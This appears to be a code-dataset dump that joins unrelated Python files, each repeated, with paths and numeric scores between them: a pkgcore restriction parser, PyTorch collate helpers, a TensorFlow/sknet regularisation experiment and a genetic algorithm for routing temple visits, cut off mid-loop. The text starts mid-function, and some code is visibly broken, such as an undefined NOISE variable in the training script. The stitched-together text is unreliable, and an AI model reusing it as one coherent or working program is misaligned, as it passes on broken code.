if len(chunks) == 1:
raise ParseError(f'missing valid package version: {orig_text!r}')
version_txt = chunks[-1]
version = cpv.isvalid_version_re.match(version_txt)
if not version:
if '*' in version_txt:
raise ParseError(
f'operator {op!r} invalid with globbed version: {version_txt!r}')
raise ParseError(f'missing valid package version: {orig_text!r}')
restrictions.append(restricts.VersionMatch(op, version.group(0)))
# parse the remaining chunk
restrictions.append(parse_match(chunks[0]))
return restrictions
def parse_pv(repo, text):
"""Return a CPV instance from either a cpv or a pv string.
If a pv is passed it needs to match a single cpv in repo.
"""
try:
return cpv.CPV.versioned(text)
except errors.InvalidCPV:
restrict = parse_match(f"={text}")
result = None
for match in repo.itermatch(restrict):
if result is not None:
raise ParseError(
f"multiple matches for {text} ({result.cpvstr}, {match.cpvstr})")
result = match
if result is None:
raise ParseError(f"no matches for {text}")
return cpv.CPV(result.category, result.package, result.version)
parse_funcs = {
'match': parse_match,
} | src/pkgcore/util/parserestrict.py | import re
from ..ebuild import atom, cpv, errors, restricts
from ..restrictions import packages, values
from ..restrictions.util import collect_package_restrictions
valid_globbing = re.compile(r"^(?:[\w+-.]+|(?<!\*)\*)+$").match
class ParseError(ValueError):
"""Raised if parsing a restriction expression failed."""
def comma_separated_containment(attr, values_kls=frozenset, token_kls=str):
"""Helper for parsing comma-separated strings to a ContainmentMatch2.
:param attr: name of the attribute.
:return: a parse function: takes a string of comma-separated values,
returns a :obj:`packages.PackageRestriction` matching packages that
have any of those values in the attribute passed to this function.
"""
def _parse(value):
return packages.PackageRestriction(
attr, values.ContainmentMatch2(
values_kls(token_kls(piece.strip()) for piece in value.split(','))
)
)
return _parse
def convert_glob(token):
if token in ('*', ''):
return None
elif '*' not in token:
return values.StrExactMatch(token)
elif not valid_globbing(token):
raise ParseError(
"globs must be composed of [\\w-.+], with optional "
f"'*'- {token!r} is disallowed however")
pattern = re.escape(token).replace('\\*', '.*')
pattern = f"^{pattern}$"
return values.StrRegex(pattern, match=True)
def collect_ops(text):
i = 0
while i < len(text) and text[i] in ("<", "=", ">", "~"):
i += 1
return text[0:i], text[i:]
def parse_match(text):
"""generate appropriate restriction for text
Parsing basically breaks it down into chunks split by /, with each
chunk allowing for prefix/postfix globbing- note that a postfixed
glob on package token is treated as package attribute matching,
not as necessarily a version match.
If only one chunk is found, it's treated as a package chunk.
Finally, it supports a nonstandard variation of atom syntax where
the category can be dropped.
Examples:
- `*`: match all
- `dev-*/*`: category must start with 'dev-'
- `dev-*`: package must start with 'dev-'
- `*-apps/portage*`: category must end in '-apps', package must start with
'portage'
- `>=portage-2.1`: atom syntax, package 'portage', version greater then or
equal to '2.1'
- dev-qt/*:5: all Qt 5 libs
- boost:0/1.60: all packages named boost with a slot/subslot of 0/1.60.0
:param text: string to attempt to parse
:type text: string
:return: :obj:`pkgcore.restrictions.packages` derivative
"""
orig_text = text = text.strip()
if "!" in text:
raise ParseError(
f"'!' or any form of blockers make no sense in this usage: {text!r}")
restrictions = []
if '::' in text:
text, repo_id = text.rsplit('::', 1)
restrictions.append(restricts.RepositoryDep(repo_id))
if ':' in text:
text, slot = text.rsplit(':', 1)
slot, _sep, subslot = slot.partition('/')
if slot:
if '*' in slot:
if r := convert_glob(slot):
restrictions.append(packages.PackageRestriction("slot", r))
else:
restrictions.append(restricts.SlotDep(slot))
if subslot:
if '*' in subslot:
if r := convert_glob(subslot):
restrictions.append(packages.PackageRestriction("subslot", r))
else:
restrictions.append(restricts.SubSlotDep(subslot))
tsplit = text.rsplit("/", 1)
if len(tsplit) == 1:
ops, text = collect_ops(text)
if not ops:
if "*" in text:
if r := convert_glob(text):
restrictions.append(packages.PackageRestriction("package", r))
else:
restrictions.append(packages.AlwaysTrue)
if len(restrictions) == 1:
return restrictions[0]
return packages.AndRestriction(*restrictions)
elif text.startswith("*"):
raise ParseError(
f"cannot do prefix glob matches with version ops: {orig_text}")
# ok... fake category. whee.
try:
r = list(collect_package_restrictions(
atom.atom(f"{ops}category/{text}").restrictions,
attrs=("category",), invert=True))
except errors.MalformedAtom as e:
e.atom = orig_text
raise ParseError(str(e)) from e
if not restrictions and len(r) == 1:
return r[0]
restrictions.extend(r)
return packages.AndRestriction(*restrictions)
elif text[0] in atom.valid_ops or '*' not in text:
# possibly a valid atom object
try:
return atom.atom(orig_text)
except errors.MalformedAtom as e:
if '*' not in text:
raise ParseError(str(e)) from e
# support globbed targets with version restrictions
return packages.AndRestriction(*parse_globbed_version(text, orig_text))
r = list(map(convert_glob, tsplit))
if not r[0] and not r[1]:
restrictions.append(packages.AlwaysTrue)
elif not r[0]:
restrictions.append(packages.PackageRestriction("package", r[1]))
elif not r[1]:
restrictions.append(packages.PackageRestriction("category", r[0]))
else:
restrictions.extend((
packages.PackageRestriction("category", r[0]),
packages.PackageRestriction("package", r[1]),
))
if len(restrictions) == 1:
return restrictions[0]
return packages.AndRestriction(*restrictions)
def parse_globbed_version(text, orig_text):
"""Support parsing globbed targets with limited version restrictions.
For example, '>=*/alsa-*-1.1.7' would match all packages named 'alsa-*'
that are version 1.1.7 or greater.
"""
restrictions = []
# find longest matching op
op = max(x for x in atom.valid_ops if text.startswith(x))
text = text[len(op):]
# determine pkg version
chunks = text.rsplit('-', 1)
if len(chunks) == 1:
raise ParseError(f'missing valid package version: {orig_text!r}')
version_txt = chunks[-1]
version = cpv.isvalid_version_re.match(version_txt)
if not version:
if '*' in version_txt:
raise ParseError(
f'operator {op!r} invalid with globbed version: {version_txt!r}')
raise ParseError(f'missing valid package version: {orig_text!r}')
restrictions.append(restricts.VersionMatch(op, version.group(0)))
# parse the remaining chunk
restrictions.append(parse_match(chunks[0]))
return restrictions
def parse_pv(repo, text):
"""Return a CPV instance from either a cpv or a pv string.
If a pv is passed it needs to match a single cpv in repo.
"""
try:
return cpv.CPV.versioned(text)
except errors.InvalidCPV:
restrict = parse_match(f"={text}")
result = None
for match in repo.itermatch(restrict):
if result is not None:
raise ParseError(
f"multiple matches for {text} ({result.cpvstr}, {match.cpvstr})")
result = match
if result is None:
raise ParseError(f"no matches for {text}")
return cpv.CPV(result.category, result.package, result.version)
parse_funcs = {
'match': parse_match,
} | 0.698844 | 0.356951 |
import torch
def videoset_train_collate(batch):
videos, vmasks, labels = [], [], []
for item, label in batch:
videos.append(item[0])
vmasks.append(item[1])
labels.append(label)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(labels, dim=0))
def videoset_emb_collate(batch):
video_batch, mask_batch, vid_batch = [], [], []
for video, mask, vid in batch:
video_batch.append(video)
mask_batch.append(mask)
vid_batch.append(vid)
return (torch.cat(video_batch, dim=0), torch.cat(mask_batch, dim=0),
vid_batch)
def vaset_train_collate(batch):
videos, vmasks, audios, amasks, labels = [], [], [], [], []
for item, label in batch:
videos.append(item[0])
vmasks.append(item[1])
audios.append(item[2])
amasks.append(item[3])
labels.append(label)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(audios, dim=0), torch.cat(amasks, dim=0),
torch.cat(labels, dim=0))
def vaset_emb_collate(batch):
videos, vmasks, audios, amasks, vid_batch = [], [], [], [], []
for video, vmask, audio, amask, vid in batch:
videos.append(video)
vmasks.append(vmask)
audios.append(audio)
amasks.append(amask)
vid_batch.append(vid)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(audios, dim=0), torch.cat(amasks, dim=0),
vid_batch)
def vtset_train_collate(batch):
videos, vmasks, texts, tmasks, labels = [], [], [], [], []
for item in batch:
videos.append(item[0])
vmasks.append(item[1])
texts.append(item[2])
tmasks.append(item[3])
labels.append(item[4])
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(texts, dim=0), torch.cat(tmasks, dim=0),
torch.cat(labels, dim=0))
def vtset_emb_collate(batch):
videos, vmasks, texts, tmasks, vid_batch = [], [], [], [], []
for video, vmask, text, tmask, vid in batch:
videos.append(video)
vmasks.append(vmask)
texts.append(text)
tmasks.append(tmask)
vid_batch.append(vid)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(texts, dim=0), torch.cat(tmasks, dim=0),
vid_batch) | dataloader/collate.py | import torch
def videoset_train_collate(batch):
videos, vmasks, labels = [], [], []
for item, label in batch:
videos.append(item[0])
vmasks.append(item[1])
labels.append(label)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(labels, dim=0))
def videoset_emb_collate(batch):
video_batch, mask_batch, vid_batch = [], [], []
for video, mask, vid in batch:
video_batch.append(video)
mask_batch.append(mask)
vid_batch.append(vid)
return (torch.cat(video_batch, dim=0), torch.cat(mask_batch, dim=0),
vid_batch)
def vaset_train_collate(batch):
videos, vmasks, audios, amasks, labels = [], [], [], [], []
for item, label in batch:
videos.append(item[0])
vmasks.append(item[1])
audios.append(item[2])
amasks.append(item[3])
labels.append(label)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(audios, dim=0), torch.cat(amasks, dim=0),
torch.cat(labels, dim=0))
def vaset_emb_collate(batch):
videos, vmasks, audios, amasks, vid_batch = [], [], [], [], []
for video, vmask, audio, amask, vid in batch:
videos.append(video)
vmasks.append(vmask)
audios.append(audio)
amasks.append(amask)
vid_batch.append(vid)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(audios, dim=0), torch.cat(amasks, dim=0),
vid_batch)
def vtset_train_collate(batch):
videos, vmasks, texts, tmasks, labels = [], [], [], [], []
for item in batch:
videos.append(item[0])
vmasks.append(item[1])
texts.append(item[2])
tmasks.append(item[3])
labels.append(item[4])
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(texts, dim=0), torch.cat(tmasks, dim=0),
torch.cat(labels, dim=0))
def vtset_emb_collate(batch):
videos, vmasks, texts, tmasks, vid_batch = [], [], [], [], []
for video, vmask, text, tmask, vid in batch:
videos.append(video)
vmasks.append(vmask)
texts.append(text)
tmasks.append(tmask)
vid_batch.append(vid)
return (torch.cat(videos, dim=0), torch.cat(vmasks, dim=0),
torch.cat(texts, dim=0), torch.cat(tmasks, dim=0),
vid_batch) | 0.462473 | 0.423995 |
import sys
sys.path.insert(0, "../../Sknet/")
import sknet
import os
import numpy as np
import time
import tensorflow as tf
from sknet import ops,layers
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--data_augmentation', type=int)
parser.add_argument('--dataset', type=str)
parser.add_argument('--model', type=str)
parser.add_argument('--epsilon', type=float)
parser.add_argument('-n', type=int)
parser.add_argument('--gamma', type=float)
parser.add_argument('--lr', type=float)
args = parser.parse_args()
DATA_AUGMENTATION = args.data_augmentation
EPSILON = args.epsilon
DATASET = args.dataset
MODEL = args.model
GAMMA = args.gamma
N = args.n
LR = args.lr
# Data Loading
#-------------
if DATASET=='cifar10':
dataset = sknet.datasets.load_cifar10()
elif DATASET=='mnist':
dataset = sknet.datasets.load_mnist()
elif DATASET=='svhn':
dataset = sknet.datasets.load_svhn()
elif DATASET=='cifar100':
dataset = sknet.datasets.load_cifar100()
dataset['indicator/train_set'] = np.concatenate([np.ones(len(dataset['images/train_set'])),
np.zeros(len(dataset['images/test_set']))])
dataset['indicator/test_set'] = np.zeros(4000)
dataset['images/train_set'] = np.concatenate([dataset['images/train_set'],
dataset['images/test_set']],0)
dataset['labels/train_set'] = np.concatenate([dataset['labels/train_set'],
dataset['labels/test_set']],0)
if "valid_set" not in dataset.sets:
dataset.split_set("train_set","valid_set",0.15)
preprocess = sknet.datasets.Standardize().fit(dataset['images/train_set'])
dataset['images/train_set'] = preprocess.transform(dataset['images/train_set'])
dataset['images/test_set'] = preprocess.transform(dataset['images/test_set'])
dataset['images/valid_set'] = preprocess.transform(dataset['images/valid_set'])
options = {'train_set': "random_see_all",
'valid_set': 'continuous',
'test_set': 'continuous'}
dataset.create_placeholders(32, options, device="/cpu:0")
const = (2*EPSILON)**(1./2)
# Create Network
#---------------
dnn = sknet.Network()
if DATA_AUGMENTATION:
start = 2
dnn.append(sknet.ops.RandomAxisReverse(dataset.images, axis=[-1]))
if DATASET == 'fashion':
dnn.append(sknet.ops.RandomCrop(dnn[-1], (28, 28), pad=(6, 6), seed=10))
elif DATASET in ['cifar10', 'cifar100', 'svhn']:
dnn.append(sknet.ops.RandomCrop(dnn[-1], (32, 32), pad=(8, 8), seed=10))
else:
dnn.append(dataset.images)
start = 1
noise = tf.nn.l2_normalize(tf.random_normal(dnn[-1].get_shape().as_list()),
(1, 2, 3))*EPSILON
dnn.append(ops.Concat([dnn[-1],dnn[-1]+noise],axis=0))
if MODEL == 'cnn':
sknet.networks.ConvLarge(dnn, noise=NOISE)
elif MODEL == 'simpleresnet':
sknet.networks.Resnet(dnn, D=4, W=1, block=sknet.layers.ResBlockV2)
elif MODEL == 'resnet':
sknet.networks.Resnet(dnn, D=10, W=1, block=sknet.layers.ResBlockV2)
elif MODEL == 'wideresnet':
sknet.networks.Resnet(dnn, D=6, W=2, block=sknet.layers.ResBlockV2)
dnn.append(sknet.ops.Dense(dnn[-1], dataset.n_classes))
# accuracy and loss
vvv = tf.reshape(tf.cast(dataset.indicator, tf.float32), (-1, 1, 1, 1))
def compute_row(i):
onehot = tf.ones((64 ,1))*tf.expand_dims(tf.one_hot(i, dataset.n_classes), 0)
grad = tf.gradients(dnn[-1], dnn[start], onehot)[0]
return tf.reduce_mean(tf.sqrt(tf.reduce_sum((1-vvv)*tf.square((grad[:32]-grad[32:])/EPSILON),
[1, 2, 3])+0.0001))
prediction = dnn[-1]
hessian = tf.sqrt(tf.reduce_sum(tf.map_fn(compute_row, tf.range(dataset.n_classes),
dtype=tf.float32))+0.0001)
accu = sknet.losses.streaming_mean(sknet.losses.accuracy(dataset.labels,
dnn[-1][:32]))
vvv = tf.cast(tf.reshape(dataset.indicator, (-1, 1)), tf.float32)
loss = sknet.losses.crossentropy_logits(dataset.labels, vvv*dnn[-1][:32]) +\
GAMMA*hessian
# optimizer and updates
B = dataset.N_BATCH('train_set')
lr = sknet.schedules.PiecewiseConstant(LR, {70*B: LR/3, 120*B: LR/9})
optimizer = sknet.optimizers.Adam(loss, dnn.variables(trainable=True), lr)
minimizer = tf.group(*optimizer.updates, *dnn.updates)
reset = tf.group(optimizer.reset_variables_op, dnn.reset_variables_op)
# Workers
train = sknet.Worker(minimizer, loss=loss, accu=accu, hessian=hessian,
context='train_set', to_print=loss,
feed_dict=dnn.deter_dict(False))
test = sknet.Worker(loss=loss, accu=accu, hessian=hessian,
context='test_set', to_print=accu,
feed_dict=dnn.deter_dict(True))
valid = sknet.Worker(loss=loss, accu=accu, hessian=hessian,
context='valid_set', to_print=accu,
feed_dict=dnn.deter_dict(True))
# Pipeline
workplace = sknet.utils.Workplace(dataset=dataset)
path = '/mnt/drive1/rbalSpace/Hessian/acttest_{}_{}_{}_{}_{}_{}_{}_{}.h5'
#path = '/mnt/project2/rb42Data/BatchNorm/pretrain_{}_{}_{}_{}_{}.h5'
for run in range(5):
workplace.init_file(path.format(MODEL, DATASET, EPSILON,
DATA_AUGMENTATION, N, GAMMA, LR, run))
workplace.execute_worker((train, valid, test), repeat=150)
workplace.session.run(reset)
dnn = sknet.Network() | REGUL/run_test.py | import sys
sys.path.insert(0, "../../Sknet/")
import sknet
import os
import numpy as np
import time
import tensorflow as tf
from sknet import ops,layers
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--data_augmentation', type=int)
parser.add_argument('--dataset', type=str)
parser.add_argument('--model', type=str)
parser.add_argument('--epsilon', type=float)
parser.add_argument('-n', type=int)
parser.add_argument('--gamma', type=float)
parser.add_argument('--lr', type=float)
args = parser.parse_args()
DATA_AUGMENTATION = args.data_augmentation
EPSILON = args.epsilon
DATASET = args.dataset
MODEL = args.model
GAMMA = args.gamma
N = args.n
LR = args.lr
# Data Loading
#-------------
if DATASET=='cifar10':
dataset = sknet.datasets.load_cifar10()
elif DATASET=='mnist':
dataset = sknet.datasets.load_mnist()
elif DATASET=='svhn':
dataset = sknet.datasets.load_svhn()
elif DATASET=='cifar100':
dataset = sknet.datasets.load_cifar100()
dataset['indicator/train_set'] = np.concatenate([np.ones(len(dataset['images/train_set'])),
np.zeros(len(dataset['images/test_set']))])
dataset['indicator/test_set'] = np.zeros(4000)
dataset['images/train_set'] = np.concatenate([dataset['images/train_set'],
dataset['images/test_set']],0)
dataset['labels/train_set'] = np.concatenate([dataset['labels/train_set'],
dataset['labels/test_set']],0)
if "valid_set" not in dataset.sets:
dataset.split_set("train_set","valid_set",0.15)
preprocess = sknet.datasets.Standardize().fit(dataset['images/train_set'])
dataset['images/train_set'] = preprocess.transform(dataset['images/train_set'])
dataset['images/test_set'] = preprocess.transform(dataset['images/test_set'])
dataset['images/valid_set'] = preprocess.transform(dataset['images/valid_set'])
options = {'train_set': "random_see_all",
'valid_set': 'continuous',
'test_set': 'continuous'}
dataset.create_placeholders(32, options, device="/cpu:0")
const = (2*EPSILON)**(1./2)
# Create Network
#---------------
dnn = sknet.Network()
if DATA_AUGMENTATION:
start = 2
dnn.append(sknet.ops.RandomAxisReverse(dataset.images, axis=[-1]))
if DATASET == 'fashion':
dnn.append(sknet.ops.RandomCrop(dnn[-1], (28, 28), pad=(6, 6), seed=10))
elif DATASET in ['cifar10', 'cifar100', 'svhn']:
dnn.append(sknet.ops.RandomCrop(dnn[-1], (32, 32), pad=(8, 8), seed=10))
else:
dnn.append(dataset.images)
start = 1
noise = tf.nn.l2_normalize(tf.random_normal(dnn[-1].get_shape().as_list()),
(1, 2, 3))*EPSILON
dnn.append(ops.Concat([dnn[-1],dnn[-1]+noise],axis=0))
if MODEL == 'cnn':
sknet.networks.ConvLarge(dnn, noise=NOISE)
elif MODEL == 'simpleresnet':
sknet.networks.Resnet(dnn, D=4, W=1, block=sknet.layers.ResBlockV2)
elif MODEL == 'resnet':
sknet.networks.Resnet(dnn, D=10, W=1, block=sknet.layers.ResBlockV2)
elif MODEL == 'wideresnet':
sknet.networks.Resnet(dnn, D=6, W=2, block=sknet.layers.ResBlockV2)
dnn.append(sknet.ops.Dense(dnn[-1], dataset.n_classes))
# accuracy and loss
vvv = tf.reshape(tf.cast(dataset.indicator, tf.float32), (-1, 1, 1, 1))
def compute_row(i):
onehot = tf.ones((64 ,1))*tf.expand_dims(tf.one_hot(i, dataset.n_classes), 0)
grad = tf.gradients(dnn[-1], dnn[start], onehot)[0]
return tf.reduce_mean(tf.sqrt(tf.reduce_sum((1-vvv)*tf.square((grad[:32]-grad[32:])/EPSILON),
[1, 2, 3])+0.0001))
prediction = dnn[-1]
hessian = tf.sqrt(tf.reduce_sum(tf.map_fn(compute_row, tf.range(dataset.n_classes),
dtype=tf.float32))+0.0001)
accu = sknet.losses.streaming_mean(sknet.losses.accuracy(dataset.labels,
dnn[-1][:32]))
vvv = tf.cast(tf.reshape(dataset.indicator, (-1, 1)), tf.float32)
loss = sknet.losses.crossentropy_logits(dataset.labels, vvv*dnn[-1][:32]) +\
GAMMA*hessian
# optimizer and updates
B = dataset.N_BATCH('train_set')
lr = sknet.schedules.PiecewiseConstant(LR, {70*B: LR/3, 120*B: LR/9})
optimizer = sknet.optimizers.Adam(loss, dnn.variables(trainable=True), lr)
minimizer = tf.group(*optimizer.updates, *dnn.updates)
reset = tf.group(optimizer.reset_variables_op, dnn.reset_variables_op)
# Workers
train = sknet.Worker(minimizer, loss=loss, accu=accu, hessian=hessian,
context='train_set', to_print=loss,
feed_dict=dnn.deter_dict(False))
test = sknet.Worker(loss=loss, accu=accu, hessian=hessian,
context='test_set', to_print=accu,
feed_dict=dnn.deter_dict(True))
valid = sknet.Worker(loss=loss, accu=accu, hessian=hessian,
context='valid_set', to_print=accu,
feed_dict=dnn.deter_dict(True))
# Pipeline
workplace = sknet.utils.Workplace(dataset=dataset)
path = '/mnt/drive1/rbalSpace/Hessian/acttest_{}_{}_{}_{}_{}_{}_{}_{}.h5'
#path = '/mnt/project2/rb42Data/BatchNorm/pretrain_{}_{}_{}_{}_{}.h5'
for run in range(5):
workplace.init_file(path.format(MODEL, DATASET, EPSILON,
DATA_AUGMENTATION, N, GAMMA, LR, run))
workplace.execute_worker((train, valid, test), repeat=150)
workplace.session.run(reset)
dnn = sknet.Network() | 0.439507 | 0.163746 |
from datetime import datetime
from datetime import timedelta
import pytz
import time
import numpy as np
import json
import pandas as pd
from fitness_all import fitnessOfPath
import random
from scipy.stats import truncnorm
from matplotlib import pyplot as plt
def evaluate_fitness_of_all(generation,sessions,travel_time,daysotw,timezones,dictionary):
m = np.size(generation,1)
total_time = []
for i in range(m):
gen_time = 0
path = generation.astype(int)
path = path[:,i]
listpath = str(path.tolist())
if listpath in dictionary:
fitness_path = dictionary[listpath]
else:
fitness_path = fitnessOfPath(path,sessions,travel_time,daysotw,timezones)
dictionary[listpath] = fitness_path
total_time.append(fitness_path)
return total_time
def runExperiment(cross_percent_ordered,cross_percent_swap,mutat_percent,num_gen,gen_size,tourneykeep,dictionary,sessions,travel_time,daysotw,timezones,all_history,all_fitness,all_times,xopts,fopts,all_iterations):
start = time.time()
tourny_size = 2
num_temples = len(timezones)
old_gen = np.zeros((num_temples,gen_size))
parents = np.zeros((2,))
children = np.zeros((num_temples,2))
for i in range(gen_size):
col = np.random.permutation(num_temples)
old_gen[:,i] = np.transpose(col)
initial_gen = old_gen
initial_fit = evaluate_fitness_of_all(old_gen, sessions, travel_time, daysotw, timezones, dictionary)
prev_fit = np.array(initial_fit)
# Generation For Loop
fitness_history = []
best_history = []
prev_fit_one_behind = 20000000000000000
end_timer = 0
for gen in range(num_gen):
# Child Generation For loop
old_fit = prev_fit.tolist()
# Do a tournament
new_gen = np.zeros((num_temples,gen_size*2))
for i in range(int(gen_size)):
# Two tournaments for the two parents
for j in range(2):
# Select Parents (By fitness) (Tournament Style)
tourny_participants = random.sample(list(range(gen_size)), tourny_size)
arg = np.argmin(np.array(old_fit)[tourny_participants])
if(np.random.rand(1)>tourneykeep):
del tourny_participants[arg]
parents[j] = np.copy(tourny_participants[0])
else:
parents[j]= np.copy(tourny_participants[arg])
children[:,0] = np.copy(old_gen[:,np.copy(int(parents[0]))])
children[:,1] = np.copy(old_gen[:,np.copy(int(parents[1]))])
if end_timer > 200:
if np.array_equal(children[:,0],children[:,1]):
children[:,1] = np.random.permutation(num_temples)
#Crossover (Uniform) (With chromosome repair)
for j in range(num_temples): #Iterate through the genes of the children.
# TODO preallocate random numbers in the beginning
if np.random.rand(1) < cross_percent_swap:
#Store the genes
temp1 = np.copy(children[j][0]) #Temporarily store child one's gene
temp2 = np.copy(children[j][1])
#Child one gene swap and chromosome repair
gene_loc_1 = np.argwhere(children[:,0]==temp2).flatten()[0] #Find the location of the gene to be swapped
gene_loc_2 = np.argwhere(children[:,1]==temp1).flatten()[0]
children[gene_loc_1][0] = np.copy(temp1)
children[j][0] = np.copy(temp2)
children[gene_loc_2][1] = np.copy(temp2)
children[j][1] = np.copy(temp1)
#Ordered Crossover
crossover_values = []
for j in range(num_temples): #Iterate through the genes of the children.
if np.random.rand(1) < cross_percent_ordered:
crossover_values.append(j)
# array of the order of the values of the first parent
if len(crossover_values) != 0:
child1 = children[:,0]
child2 = children[:,1]
indices1 = np.sort([np.where(child1==cv)[0][0] for cv in crossover_values])
indices2 = np.sort([np.where(child2==cv)[0][0] for cv in crossover_values])
temp1 = np.copy(child1)
temp2 = np.copy(child2)
child1[indices1] = np.copy(temp2[indices2])
child2[indices2] = np.copy(temp1[indices1])
#Mutation (Uniform)
for chil in range(2):
for j in range(num_temples): #Iterate through the genes of the children.
if np.random.rand(1) < mutat_percent:
# Child gene insertion
mutated_value = np.random.randint(0,num_temples)
if mutated_value == children[j,chil]:
continue
gene_loc_mutate = np.argwhere(children[:,chil]==mutated_value).flatten()[0]
child = children[:,chil]
updated_child = np.insert(child,j,mutated_value)
if j > gene_loc_mutate:
child = np.delete(updated_child,gene_loc_mutate)
else:
child = np.delete(updated_child,gene_loc_mutate+1)
children[:,chil] = np.copy(child)
#Store Children into new generation
new_gen[:,2*(i+1)-2] = np.copy(children[:,0])
new_gen[:,2*(i+1)-1] = np.copy(children[:,1])
#Elitism (Pick top N)
current_gen = np.concatenate((old_gen,new_gen),axis=1); #Concatenate together for fitness function
new_fit = evaluate_fitness_of_all(new_gen, sessions, travel_time, daysotw, timezones, dictionary)
current_gen_fit = old_fit+new_fit
winners = np.array(current_gen_fit).argsort()[:gen_size]
old_gen = np.copy(current_gen[:,winners])
prev_fit = np.copy(np.array(current_gen_fit)[winners])
I = np.argmin(current_gen_fit)
fit_now = current_gen_fit[I]
fitness_history.append(fit_now)
best_history.append(current_gen[:,I].tolist())
print(gen)
# Check if the GA is in a local optimum for too long
if fit_now < prev_fit_one_behind:
prev_fit_one_behind = fit_now
end_timer = 0
else:
if end_timer > 400:
end_timer = 0
else:
end_timer += 1
if gen%100:
print(fit_now)
final_gen = old_gen
final_fit = evaluate_fitness_of_all(old_gen, sessions, travel_time, daysotw, timezones, dictionary)
I = np.argmin(final_fit)
fit_opt = final_fit[I]
xopt = final_gen[:,I]+1
endtime = time.time()
all_iterations.append(gen)
all_history.append(best_history)
all_fitness.append(fitness_history)
all_times.append(endtime-start)
xopts.append(xopt.tolist())
fopts.append(fit_opt)
print(gen) | Project2/python/geneticAlgorithm.py | from datetime import datetime
from datetime import timedelta
import pytz
import time
import numpy as np
import json
import pandas as pd
from fitness_all import fitnessOfPath
import random
from scipy.stats import truncnorm
from matplotlib import pyplot as plt
def evaluate_fitness_of_all(generation,sessions,travel_time,daysotw,timezones,dictionary):
m = np.size(generation,1)
total_time = []
for i in range(m):
gen_time = 0
path = generation.astype(int)
path = path[:,i]
listpath = str(path.tolist())
if listpath in dictionary:
fitness_path = dictionary[listpath]
else:
fitness_path = fitnessOfPath(path,sessions,travel_time,daysotw,timezones)
dictionary[listpath] = fitness_path
total_time.append(fitness_path)
return total_time
def runExperiment(cross_percent_ordered,cross_percent_swap,mutat_percent,num_gen,gen_size,tourneykeep,dictionary,sessions,travel_time,daysotw,timezones,all_history,all_fitness,all_times,xopts,fopts,all_iterations):
start = time.time()
tourny_size = 2
num_temples = len(timezones)
old_gen = np.zeros((num_temples,gen_size))
parents = np.zeros((2,))
children = np.zeros((num_temples,2))
for i in range(gen_size):
col = np.random.permutation(num_temples)
old_gen[:,i] = np.transpose(col)
initial_gen = old_gen
initial_fit = evaluate_fitness_of_all(old_gen, sessions, travel_time, daysotw, timezones, dictionary)
prev_fit = np.array(initial_fit)
# Generation For Loop
fitness_history = []
best_history = []
prev_fit_one_behind = 20000000000000000
end_timer = 0
for gen in range(num_gen):
# Child Generation For loop
old_fit = prev_fit.tolist()
# Do a tournament
new_gen = np.zeros((num_temples,gen_size*2))
for i in range(int(gen_size)):
# Two tournaments for the two parents
for j in range(2):
# Select Parents (By fitness) (Tournament Style)
tourny_participants = random.sample(list(range(gen_size)), tourny_size)
arg = np.argmin(np.array(old_fit)[tourny_participants])
if(np.random.rand(1)>tourneykeep):
del tourny_participants[arg]
parents[j] = np.copy(tourny_participants[0])
else:
parents[j]= np.copy(tourny_participants[arg])
children[:,0] = np.copy(old_gen[:,np.copy(int(parents[0]))])
children[:,1] = np.copy(old_gen[:,np.copy(int(parents[1]))])
if end_timer > 200:
if np.array_equal(children[:,0],children[:,1]):
children[:,1] = np.random.permutation(num_temples)
#Crossover (Uniform) (With chromosome repair)
for j in range(num_temples): #Iterate through the genes of the children.
# TODO preallocate random numbers in the beginning
if np.random.rand(1) < cross_percent_swap:
#Store the genes
temp1 = np.copy(children[j][0]) #Temporarily store child one's gene
temp2 = np.copy(children[j][1])
#Child one gene swap and chromosome repair
gene_loc_1 = np.argwhere(children[:,0]==temp2).flatten()[0] #Find the location of the gene to be swapped
gene_loc_2 = np.argwhere(children[:,1]==temp1).flatten()[0]
children[gene_loc_1][0] = np.copy(temp1)
children[j][0] = np.copy(temp2)
children[gene_loc_2][1] = np.copy(temp2)
children[j][1] = np.copy(temp1)
#Ordered Crossover
crossover_values = []
for j in range(num_temples): #Iterate through the genes of the children.
if np.random.rand(1) < cross_percent_ordered:
crossover_values.append(j)
# array of the order of the values of the first parent
if len(crossover_values) != 0:
child1 = children[:,0]
child2 = children[:,1]
indices1 = np.sort([np.where(child1==cv)[0][0] for cv in crossover_values])
indices2 = np.sort([np.where(child2==cv)[0][0] for cv in crossover_values])
temp1 = np.copy(child1)
temp2 = np.copy(child2)
child1[indices1] = np.copy(temp2[indices2])
child2[indices2] = np.copy(temp1[indices1])
#Mutation (Uniform)
for chil in range(2):
for j in range(num_temples): #Iterate through the genes of the children.
if np.random.rand(1) < mutat_percent:
# Child gene insertion
mutated_value = np.random.randint(0,num_temples)
if mutated_value == children[j,chil]:
continue
gene_loc_mutate = np.argwhere(children[:,chil]==mutated_value).flatten()[0]
child = children[:,chil]
updated_child = np.insert(child,j,mutated_value)
if j > gene_loc_mutate:
child = np.delete(updated_child,gene_loc_mutate)
else:
child = np.delete(updated_child,gene_loc_mutate+1)
children[:,chil] = np.copy(child)
#Store Children into new generation
new_gen[:,2*(i+1)-2] = np.copy(children[:,0])
new_gen[:,2*(i+1)-1] = np.copy(children[:,1])
#Elitism (Pick top N)
current_gen = np.concatenate((old_gen,new_gen),axis=1); #Concatenate together for fitness function
new_fit = evaluate_fitness_of_all(new_gen, sessions, travel_time, daysotw, timezones, dictionary)
current_gen_fit = old_fit+new_fit
winners = np.array(current_gen_fit).argsort()[:gen_size]
old_gen = np.copy(current_gen[:,winners])
prev_fit = np.copy(np.array(current_gen_fit)[winners])
I = np.argmin(current_gen_fit)
fit_now = current_gen_fit[I]
fitness_history.append(fit_now)
best_history.append(current_gen[:,I].tolist())
print(gen)
# Check if the GA is in a local optimum for too long
if fit_now < prev_fit_one_behind:
